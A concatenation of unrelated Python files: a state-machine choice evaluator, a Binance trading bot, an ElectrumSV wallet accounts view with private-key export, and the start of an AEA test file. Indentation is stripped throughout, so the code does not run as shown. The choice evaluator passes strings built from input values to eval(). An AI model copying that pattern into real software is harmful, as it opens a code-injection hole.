for k, v in list(d.items()):
if isinstance(v, dict):
self.traverse(path + "/" + k, v)
elif isinstance(v, list):
self.traverse(path + "/" + k, v)
else:
d_sum[k] = v
self.nodelist.append(path + "/" + str(d_sum))
if isinstance(obj, list):
li = obj
for e in li:
cnt += 1
if isinstance(e, dict):
self.traverse("{path}".format(path=path), e)
elif isinstance(e, list):
self.traverse("{path}".format(path=path), e)
def evaluateNextState(self, function_input):
# this should be called for Choice state only
# for the rest the next values are statically defined and are parsed by hostagent
nextfunc = self.default_next_choice[-1]
self._logger.debug("[StateUtils] choice_function_input: " + str(function_input))
for tree in self.parsed_trees:
##self._logger.debug("Resulting Rendered Tree: " + str(anytree.RenderTree(tree.root)))
##self._logger.debug("Resulting Rendered Tree Root: " + str(tree.root))
test = self.EvaluateNode(tree.children[0])
self._logger.debug("[StateUtils] choice test: " + str(test))
self._logger.debug("Resulting Parsed Expression: " + str(test))
self._logger.debug("Current Value String: " + json.dumps(function_input))
# Sample value input to choice {"Comment": "Test my Iterator function", "iterator": {"count": 10, "index": 5, "step": 1}}
for key in list(function_input.keys()):
new_test = "False"
key = str(key)
if key == "Comment":
continue
#if "iterator.continue" == str(key):
self._logger.debug("[StateUtils] choice value key under test: " + key)
#keys = "continue"
if key in str(test):
val = function_input[key]
self._logger.debug("[StateUtils] choice val: " + str(val))
if isinstance(val, (int, float)): # calculate new_test value, no additional processing of values
self._logger.debug("[StateUtils] choice key/val: " + key + "/" + str(val))
new_test = test.replace(key, str(val))
self._logger.debug("[StateUtils] choice eval new_test: " + str(eval(str(new_test))))
elif "." in test: # need to process the json path of this variable name
test2 = "$." + test.lstrip('(').rstrip(')').split("==")[0] # rebuild the json path for the variable
jsonpath_expr = parse(test2)
choice_state_path_data = [match.value for match in jsonpath_expr.find(function_input)]
new_test = str(choice_state_path_data[0])
else:
new_test = test.replace(key, "'" + str(val)+"'") # need to add high colons to key to mark as string inside the expression
if eval(str(new_test)):
nextfunc = tree.root.name.strip("/")
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc # {"next":nextfunc, "value": post_processed_value}
# if no choice rule applied, return the last one (assigned at the beginning)
self._logger.debug("now calling: " + str(nextfunc))
return nextfunc
|
Binance Detect Moonings.py
|
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used to create threads & dynamic loading of modules
import threading
import importlib
# used for directory handling
import glob
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API and websockets
from binance.client import Client
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds
)
# for colourful logging to the console
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
import sys
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head = (hsp_head + 1) % (TIME_DIFFERENCE * RECHECK_INTERVAL)
historical_prices[hsp_head] = initial_price
return initial_price
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
if historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
print(f'not enough time has passed yet...Session profit:{session_profit:.2f}%')
# retreive latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached.
if threshold_check > CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check < CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Disabled until fix
#print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and (len(coins_bought) + exnumber) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
os.remove(filename)
return external_list
def convert_volume():
'''Converts the volume given in QUANTITY from USDT to the each coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(QUANTITY / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
volume, last_price = convert_volume()
orders = {}
for coin in volume:
# only buy if the there are no active trades on the coin
if coin not in coins_bought:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
else:
print(f'Signal detected, but there is already an active trade on {coin}')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # don't populate rolling window
coins_sold = {}
for coin in list(coins_bought):
# define stop loss and take profit
TP = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['take_profit']) / 100
SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
# check that the price is above the take profit and readjust SL and TP accordingly if trialing stop loss used
if float(last_price[coin]['price']) > TP and USE_TRAILING_STOP_LOSS:
if DEBUG: print("TP reached, adjusting TP and SL accordingly to lock-in profit")
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
coins_bought[coin]['take_profit'] += TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
if float(last_price[coin]['price']) < SL or (float(last_price[coin]['price']) > TP and not USE_TRAILING_STOP_LOSS):
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange:.2f}%{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# Log trade
if LOG_TRADES:
profit = (LastPrice - BuyPrice) * coins_sold[coin]['volume']
write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange:.2f}%")
session_profit=session_profit + PriceChange
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange:.2f}%{txcolors.DEFAULT}')
return coins_sold
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client
client = Client(access_key, secret_key)
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open('tickers.txt')]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
time.sleep(30)
# load signalling modules
for module in SIGNALLING_MODULES:
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.start()
# seed initial prices
get_price()
while True:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
|
accounts_view.py
|
import csv
from functools import partial
import json
import os
import threading
import time
from typing import List, Optional, Sequence
import weakref
from PyQt5.QtCore import QEvent, QItemSelectionModel, QModelIndex, pyqtSignal, QSize, Qt
from PyQt5.QtGui import QPainter, QPaintEvent
from PyQt5.QtWidgets import (QLabel, QListWidget, QListWidgetItem, QMenu, QSplitter, QTabWidget,
QTextEdit, QVBoxLayout)
from electrumsv.bitcoin import address_from_string, script_template_to_string
from electrumsv.constants import AccountType, DerivationType, KeystoreType
from electrumsv.i18n import _
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, MultisigAccount, Wallet
from .account_dialog import AccountDialog
from .main_window import ElectrumWindow
from .util import (Buttons, CancelButton, filename_field, line_dialog, MessageBox, OkButton,
protected, read_QIcon, WindowModalDialog)
class AccountsView(QSplitter):
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, main_window: ElectrumWindow, wallet: Wallet) -> None:
super().__init__(main_window)
self._logger = logs.get_logger("accounts-view")
self._main_window = weakref.proxy(main_window)
self._wallet = wallet
self._main_window.account_created_signal.connect(self._on_account_created)
self._main_window.account_change_signal.connect(self._on_account_changed)
# We subclass QListWidget so accounts cannot be deselected.
class CustomListWidget(QListWidget):
def selectionCommand(self, index: QModelIndex, event: Optional[QEvent]) \
-> QItemSelectionModel.SelectionFlags:
flags = super().selectionCommand(index, event)
if flags == QItemSelectionModel.Deselect:
return QItemSelectionModel.NoUpdate
return flags
def paintEvent(self, event: QPaintEvent) -> None:
super().paintEvent(event)
if self.count() > 0:
return
painter = QPainter(self.viewport())
painter.drawText(self.rect(), Qt.AlignCenter, _("Add your first account.."))
self._account_ids: List[int] = []
self._tab_widget = QTabWidget()
self._selection_list = CustomListWidget()
self._selection_list.setMinimumWidth(150)
self._selection_list.setIconSize(QSize(32, 32))
self._selection_list.setContextMenuPolicy(Qt.CustomContextMenu)
self._selection_list.customContextMenuRequested.connect(self._show_account_menu)
self._selection_list.currentItemChanged.connect(self._on_current_item_changed)
self._current_account_id: Optional[int] = None
self.addWidget(self._selection_list)
self.addWidget(self._tab_widget)
self.setChildrenCollapsible(False)
def on_wallet_loaded(self) -> None:
self._initialize_account_list()
def init_geometry(self, sizes: Optional[Sequence[int]]=None) -> None:
self._logger.debug("init_geometry.1 %r", sizes)
if sizes is None:
sizes = [ 200, self._main_window.size().width() - 200 ]
self._logger.debug("init_geometry.2 %r", sizes)
self.setSizes(sizes)
def _on_account_created(self, new_account_id: int, new_account: AbstractAccount) -> None:
# It should be made the active wallet account and followed up with the change event.
self._add_account_to_list(new_account)
def _on_account_changed(self, new_account_id: int, new_account: AbstractAccount) -> None:
# The list is being told what to focus on.
if self._update_active_account(new_account_id):
row = self._account_ids.index(new_account_id)
self._selection_list.setCurrentRow(row)
def _on_current_item_changed(self, item: QListWidgetItem, last_item: QListWidgetItem) -> None:
account_id = item.data(Qt.UserRole)
# This should update the internal tracking, and also the active wallet account.
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _update_active_account(self, account_id: int) -> bool:
if account_id == self._current_account_id:
return False
self._current_account_id = account_id
return True
def _update_window_account(self, account: AbstractAccount) -> None:
self._main_window.set_active_account(account)
def get_tab_widget(self) -> QTabWidget:
return self._tab_widget
def _initialize_account_list(self) -> None:
self._selection_list.clear()
self._account_ids.clear()
# TODO(rt12): These should respect user ordering, and perhaps also later hierarchy.
for account in self._wallet.get_accounts():
self._add_account_to_list(account)
if len(self._account_ids):
self._selection_list.setCurrentRow(0)
currentItem = self._selection_list.currentItem()
account_id = currentItem.data(Qt.UserRole)
if self._update_active_account(account_id):
account = self._main_window._wallet.get_account(account_id)
self._update_window_account(account)
def _add_account_to_list(self, account: AbstractAccount) -> None:
account_id = account.get_id()
item = QListWidgetItem()
keystore = account.get_keystore()
derivation_type = keystore.derivation_type if keystore is not None \
else DerivationType.NONE
is_watching_only = keystore.is_watching_only() if keystore is not None else True
icon_state = "inactive" if is_watching_only else "active"
if derivation_type == DerivationType.ELECTRUM_MULTISIG:
tooltip_text = _("Multi-signature account")
icon_filename = "icons8-group-task-80-blueui-{}.png"
elif derivation_type == DerivationType.HARDWARE:
tooltip_text = _("Hardware wallet account")
icon_filename = "icons8-usb-2-80-blueui-{}.png"
elif derivation_type == DerivationType.IMPORTED:
# This should not be watch only as imported public keys have no keystore.
tooltip_text = _("Imported private key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
elif derivation_type == DerivationType.ELECTRUM_OLD:
tooltip_text = _("Old-style Electrum account")
icon_filename = "icons8-password-1-80-blueui-{}.png"
elif derivation_type == DerivationType.BIP32:
tooltip_text = _("BIP32 account")
icon_filename ="icons8-grand-master-key-80-blueui-{}.png"
else:
# This should always be watch only as imported public keys have no keystore.
tooltip_text = _("Imported public key account")
icon_filename = "icons8-key-80-plus-blueui-{}.png"
if is_watching_only:
tooltip_text += f" ({_('watch only')})"
item.setIcon(read_QIcon(icon_filename.format(icon_state)))
item.setData(Qt.UserRole, account_id)
item.setText(account.display_name())
item.setToolTip(tooltip_text)
self._selection_list.addItem(item)
self._account_ids.append(account_id)
def _show_account_menu(self, position) -> None:
item = self._selection_list.currentItem()
if not item:
return
account_id = item.data(Qt.UserRole)
account = self._wallet.get_account(account_id)
menu = QMenu()
self.add_menu_items(menu, account, self._main_window)
menu.exec_(self._selection_list.viewport().mapToGlobal(position))
def add_menu_items(self, menu: QMenu, account: AbstractAccount, main_window: ElectrumWindow) \
-> None:
menu.clear()
# This expects a reference to the main window, not the weakref.
account_id = account.get_id()
menu.addAction(_("&Information"),
partial(self._show_account_information, account_id))
seed_menu = menu.addAction(_("View &Secured Data"),
partial(self._view_secured_data, main_window=main_window, account_id=account_id))
seed_menu.setEnabled(
not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.is_hardware_wallet() \
and account.type() != AccountType.IMPORTED_PRIVATE_KEY)
menu.addAction(_("&Rename"),
partial(self._rename_account, account_id))
menu.addSeparator()
private_keys_menu = menu.addMenu(_("&Private keys"))
import_menu = private_keys_menu.addAction(_("&Import"), partial(self._import_privkey,
main_window=main_window, account_id=account_id))
import_menu.setEnabled(account.can_import_privkey())
export_menu = private_keys_menu.addAction(_("&Export"), partial(self._export_privkeys,
main_window=main_window, account_id=account_id))
export_menu.setEnabled(account.can_export())
if account.can_import_address():
menu.addAction(_("Import addresses"), partial(self._import_addresses, account_id))
menu.addSeparator()
hist_menu = menu.addMenu(_("&History"))
hist_menu.addAction("Export", main_window.export_history_dialog)
labels_menu = menu.addMenu(_("&Labels"))
action = labels_menu.addAction(_("&Import"),
partial(self._on_menu_import_labels, account_id))
labels_menu.addAction(_("&Export"), partial(self._on_menu_export_labels, account_id))
invoices_menu = menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), partial(self._on_menu_import_invoices, account_id))
payments_menu = menu.addMenu(_("Payments"))
ed_action = payments_menu.addAction(_("Export destinations"),
partial(self._generate_destinations, account_id))
keystore = account.get_keystore()
ed_action.setEnabled(keystore is not None and
keystore.type() != KeystoreType.IMPORTED_PRIVATE_KEY)
def _on_menu_import_labels(self, account_id: int) -> None:
self._main_window.do_import_labels(account_id)
def _on_menu_export_labels(self, account_id: int) -> None:
self._main_window.do_export_labels(account_id)
def _on_menu_import_invoices(self, account_id: int) -> None:
send_view = self._main_window.get_send_view(account_id)
send_view.import_invoices()
def _rename_account(self, account_id: int) -> None:
account = self._main_window._wallet.get_account(self._current_account_id)
new_account_name = line_dialog(self, _("Rename account"), _("Account name"), _("OK"),
account.get_name())
if new_account_name is None:
return
account.set_name(new_account_name)
account_row = self._account_ids.index(account_id)
item: QListWidgetItem = self._selection_list.item(account_row)
item.setText(new_account_name)
def _show_account_information(self, account_id: int) -> None:
dialog = AccountDialog(self._main_window, self._wallet, account_id, self)
dialog.exec_()
def _generate_destinations(self, account_id) -> None:
from . import payment_destinations_dialog
from importlib import reload
reload(payment_destinations_dialog)
dialog = payment_destinations_dialog.PaymentDestinationsDialog(self._main_window,
self._wallet, account_id, self)
dialog.exec_()
def _can_view_secured_data(self, account: AbstractAccount) -> None:
return not account.is_watching_only() and not isinstance(account, MultisigAccount) \
and not account.is_hardware_wallet()
@protected
def _view_secured_data(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identity the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
if self._can_view_secured_data(account):
keystore = account.get_keystore()
from .secured_data_dialog import SecuredDataDialog
d = SecuredDataDialog(self._main_window, self, keystore, password)
d.exec_()
else:
MessageBox.show_message(_("This type of account has no secured data. You are advised "
"to manually back up this wallet."), self._main_window.reference())
@protected
def _import_privkey(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
# account_id is a keyword argument so that 'protected' can identity the correct wallet
# window to do the password request in the context of.
account = self._wallet.get_account(account_id)
title, msg = _('Import private keys'), _("Enter private keys")
self._main_window._do_import(title, msg,
lambda x: account.import_private_key(x, password))
def _import_addresses(self, account_id: int) -> None:
account = self._wallet.get_account(account_id)
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
address = address_from_string(addr)
if account.import_address(address):
return addr
# Show duplicate addition same as good addition.
return addr
self._main_window._do_import(title, msg, import_addr)
@protected
def _export_privkeys(self, main_window: ElectrumWindow, account_id: int=-1,
password: Optional[str]=None) -> None:
account = self._wallet.get_account(account_id)
if isinstance(self._wallet, MultisigAccount):
MessageBox.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(main_window.config, defaultname,
select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
keyinstance_ids = account.get_keyinstance_ids()
done = False
cancelled = False
def privkeys_thread():
for keyinstance_id in keyinstance_ids:
time.sleep(0.1)
if done or cancelled:
break
privkey = account.export_private_key(keyinstance_id, password)
script_template = account.get_script_template_for_id(keyinstance_id)
script_text = script_template_to_string(script_template)
private_keys[script_text] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(script_text, privkey)
for script_text, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(keyinstance_ids))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self._do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
MessageBox.show_error(txt, title=_("Unable to create csv"))
except Exception as e:
MessageBox.show_message(str(e), main_window.reference())
return
MessageBox.show_message(_('Private keys exported'), main_window.reference())
def _do_export_privkeys(self, fileName: str, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["reference", "private_key"])
for key_text, pk in pklist.items():
transaction.writerow([key_text, pk])
else:
f.write(json.dumps(pklist, indent = 4))
|
test_aea.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for aea/aea.py."""
import os
import tempfile
import time
import unittest
from pathlib import Path
from threading import Thread
from typing import Callable
from unittest.case import TestCase
from unittest.mock import MagicMock, PropertyMock, patch
import pytest
import aea # noqa: F401
from aea.aea import AEA
from aea.aea_builder import AEABuilder
from aea.configurations.base import SkillConfig
from aea.configurations.constants import DEFAULT_LEDGER, DEFAULT_PRIVATE_KEY_FILE
from aea.crypto.wallet import Wallet
from aea.exceptions import AEAActException, AEAException, AEAHandleException
from aea.helpers.base import cd
from aea.helpers.exception_policy import ExceptionPolicyEnum
from aea.identity.base import Identity
from aea.mail.base import Envelope
from aea.protocols.base import Protocol
from aea.registries.resources import Resources
from aea.runtime import RuntimeStates
from aea.skills.base import Skill, SkillContext
from packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.default.serialization import DefaultSerializer
from packages.fetchai.protocols.fipa.message import FipaMessage
from tests.common.utils import (
AeaTool,
make_behaviour_cls_from_funcion,
make_handler_cls_from_funcion,
run_in_thread,
timeit_context,
wait_for_condition,
)
from tests.conftest import (
CUR_PATH,
FETCHAI_PRIVATE_KEY_PATH,
ROOT_DIR,
UNKNOWN_PROTOCOL_PUBLIC_ID,
_make_local_connection,
)
from tests.data.dummy_aea.skills.dummy.tasks import DummyTask # type: ignore
from tests.data.dummy_skill import PUBLIC_ID as DUMMY_SKILL_PUBLIC_ID
from tests.data.dummy_skill.behaviours import DummyBehaviour # type: ignore
def test_setup_aea():
"""Tests the initialisation of the AEA."""
